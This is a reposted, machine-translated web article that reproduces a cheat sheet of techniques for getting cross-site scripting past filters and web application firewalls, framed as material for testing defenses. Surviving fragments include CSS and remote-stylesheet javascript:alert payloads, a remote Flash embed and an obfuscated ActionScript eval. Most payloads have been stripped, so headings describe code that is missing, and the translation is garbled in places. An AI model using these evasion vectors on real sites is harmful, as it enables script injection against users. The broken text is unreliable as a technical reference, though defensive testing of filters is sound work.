Shulou(Shulou.com)05/31 Report--

Today, I would like to talk to you about how to bypass the protection of XSS, many people may not know much about it. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something from this article.

A series of XSS attacks are listed below that can be used to bypass some XSS defense filter. Filtering against input is not exactly the defense of XSS. You can use these payload to test the website's ability to protect against XSS attacks. I hope your WAF product can block all the payload below.

Text

The principle of XSS attack:

An attacker places well-constructed malicious HTML code into a website with XSS vulnerabilities, which is automatically executed when a user browses the site, thus achieving the purpose of the attack.

XSS attacks can be divided into two types: one is non-persistent XSS attacks and the other is persistent XSS attacks.

Reflexive: request address with disgusting HTML code.

Domtype: api injects some malicious HTML code into the website

Persistence: an attacker submits malicious code to the background database, and the user will receive the malicious code from the background the next time the user opens it.

Guard against:

The front end is prevented and filtered by escape.

The back-end is mainly defended by WAF regularity + OWASP rules + XSS semantic analysis + machine learning payload features.

Normal XSS JavaScript injection:

It is likely to be filtered, so it is recommended to try it first (quotation marks are not required in modern browsers, so they are omitted here)

XSS payload, which will be executed in multiple contexts, including html, script string, js, and url:

_ javascript:/*-- >

IMG SRC XSS that uses the JavaScript directive, note: IE7.0 does not support the JavaScript directive in the image context, but supports the JavaScript directive in other contexts:

No quotation marks or semicolons:

Case-confused XSS attack payload:

HTML entities, must use semicolons:

Using both double and single quotes, you can use accents to encapsulate JavaScript strings, because many cross-site scripting filters do not know the accents:

Malformed a tag, skip the HREF attribute:

Xxs link

Chrome browsers like to replace lost quotes, and Chrome puts them in the right place and fixes missing quotes on URL or scripts.

Xxs link

The malformed IMG tag is encapsulated in the IMG tag in quotation marks to create our XSS vector in order to correct the hasty coding. This makes it more difficult to parse HTML tags correctly:

FromCharCode source character code, does not allow any type of quotation marks, you can eval () a fromCharCode in JavaScript to create the desired XSS vector:

The default SRC tag gets the filter that used to check the SRC domain name, which bypasses most SRC domain filters. Inserting javascript in the event method will also apply to any HTML tag type injection that uses elements such as Form,Iframe,Input,Embed. This will also allow you to replace any related events of tag type with onblur,onclick, thus providing you with a large number of changes to many of the injections listed here:

Leave the default SRC label blank:

Default SRC tag by leaving it out entirely, completely ignoring src:

Error message onerror alert:

IMG onerror and javascript alert coding:

Decimal HTML character references, decimal character references, in out

Spaces and metacharacters before JavaScript in XSS images:

This is useful if you mistakenly assume that there can be no spaces between quotation marks and the "_ javascript:" keyword. The reality is that you can use any character between 1 and 32 after the decimal point

Non-alphanumeric XSS:

The Firefox HTML parser assumes that a non-alpha non-numeric is invalid after the HTML keyword and considers it to be a blank or invalid tag after the HTML tag.

Some XSS filters assume that the tags they are looking for are separated by whitespace. For example, the "" section.

Firefox assumes it's safe to close the HTML tag and add closing tags for you .

Protocol resolution in js tag:

If you add tags at the end, work in Opera, and Netscape works in IE rendering mode

Half-open HTML/JavaScript xss:

Unlike Firefox, the IE rendering engine does not add additional data to the page, but it allows the _ javascript: directive to be used in the image.

It does not need to close angle brackets, assuming that there are any HTML tags below, and you will inject this cross-site script vector into it. Even if the ">" tag is not closed, the tag below will close it.

Remote stylesheet Remote style sheet4:

This applies only to the Gecko rendering engine and works by binding the XUL file to the parent page. I think the irony is that Netscape thinks Gecko is more secure, so it's vulnerable to most websites.

BODY {[xss_clean]: url ("http://xss.rocks/xssmoz.xml#xss")}"

STYLE tag STYLE tags with broken up JavaScript for XSS with a shredded JavaScript for XSS:

This XSS sometimes sends the IE to an infinite loop of alerts.

@ im\ port'\ ja\ vasc\ ript:alert ("XSS")'

STYLE attribute using a comment to break up expression uses comments to split the STYLE attribute of the expression:

IMG style with expression:

This is actually a mix of the above XSS vectors, but it does show how difficult it is to separate style tags, which, as mentioned above, can send IE into a loop.

Exp/*

STYLE tag (Older versions of Netscape only):

Alert ('XSS')

STYLE tag using background-image:

.XSS {background-image:url ("_ javascript:alert ('XSS')");}

STYLE tag using background:

BODY {background:url ("_ javascript:alert ('XSS')")}

BODY {background:url ("_ javascript:alert ('XSS')")}

Anonymous HTMLAnonymous HTML with STYLE attribute with STYLE attribute:

IE6 and Netscape 8.1 + don't really care if the HTML tag you build exists in IE rendering engine mode, as long as it starts with an open angle parenthesis and a letter.

Local htc file local htc file:

This is slightly different from the above two cross-site scripting vectors because the .htc file it uses must be on the same server as the XSS vector.

The sample file works by pulling in JavaScript and running it as part of the style property.

US-ASCII encoding:

It uses malformed ASCII encoding, using 7 bits instead of 8 bits. This XSS can bypass many content filters

However, it only works if the host transmits using US-ASCII encoding or if you set the encoding yourself.

This is more useful for web application firewall cross-site scripting circumvention than server-side filter circumvention.

Apache Tomcat is the only known server that transmits in US-ASCII encoding.

1. Script 3 alert (XSS) 1 / script 3

META:

The strange thing about meta-refresh is that it doesn't send referer in the header, so it can be used for some types of attacks in which you need to delete the referenced url.

META using data:

Directs the URL scheme. This is good, because it also doesn't have anything that obviously contains scripts or JavaScript instructions, because it uses base64 encoding.

See RFC2397 for more details, or code your own here or here. If you only want to encode the original HTML or JavaScript

You can also use the following XSS calculator because it has a Base64 encoding method.

META with additional URL parameter:

If the target site attempts to see if the beginning of the URL contains "http://"."

IFRAME:

If iframes are allowed there are a lot of other XSS problems as well .

IFRAME Event based:

IFrames and most other elements can use event-based mayhem, as shown below.

FRAME:

Frames have the same sorts of XSS problems as iframes

TABLE:

TD:

As mentioned above, TD is vulnerable to backgrounds that contain JavaScript XSS vectors.

DIV:

DIV background-image

DIV background-image with unicoded XSS exploit:

This has been slightly modified to confuse the url parameter.

DIV background-image plus extra characters extra characters:

Any error characters allowed after the opening parentheses and before the JavaScript directive in secure site mode in IE and Netscape 8.1. These are decimal, but of course they can include hexadecimal and padding.

You can use any of the following characters: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279.

DIV expression:

A variant of this approach works for cross-site scripting filters that use line breaks between colons and expressions in the real world.

Downlevel-Hidden block:

Available only for IE5.0 and later, Netscape 8.1 for IE rendering engine mode). Some sites think that anything in the comment block is safe, so there is no need to delete it, which allows us to use cross-site scripting.

Or the system can add comment tags around something in an attempt to make it harmless. As we can see, this may not work.

BASE tag:

Work in safe mode in IE and Netscape 8.1. You need / / to comment out the next character so that there is no JavaScript error and the XSS tag will render.

In addition, this depends on the site using dynamically placed images, such as "images/image.jpg", rather than the full path.

If the path contains a leading forward slash, such as "/ images/image.jpg", you can remove a slash from the vector (this is valid as long as there are two slashes commenting)

OBJECT tag:

If they allow objects, you can also inject virus payloads to infect users, and so on, the same as the APPLET tag. The link file is actually a HTML file that can contain your XSS. Exe.

Use embedded tags to embed Flash movies that contain xss:

Click here to demonstrate. If you add allowScriptAccess= "never" and allownetworking= "internal" attributes, you can reduce this risk.

EMBED SRC= "http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=" never "and allownetworking=" internal "it can mitigate this risk (thank you to Jonathan Vanasco for the info):

Org/xss.swf "AllowScriptAccess=" always ">

You can EMBED SVG which can contain your XSS vector:

This example only applies to Firefox, but it is better than the above vector in Firefox because it does not require the user to open or install Flash.

Using ActionScript in flash confuses XSS vectors:

A = "get"

B = "URL (\")

C = "_ javascript:"

D = "alert ('XSS');\")

Eval (a+b+c+d)

XML data with CDATA confusion:

This XSS attack is only valid in IE and Netscape 8.1 in IE rendering engine mode.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.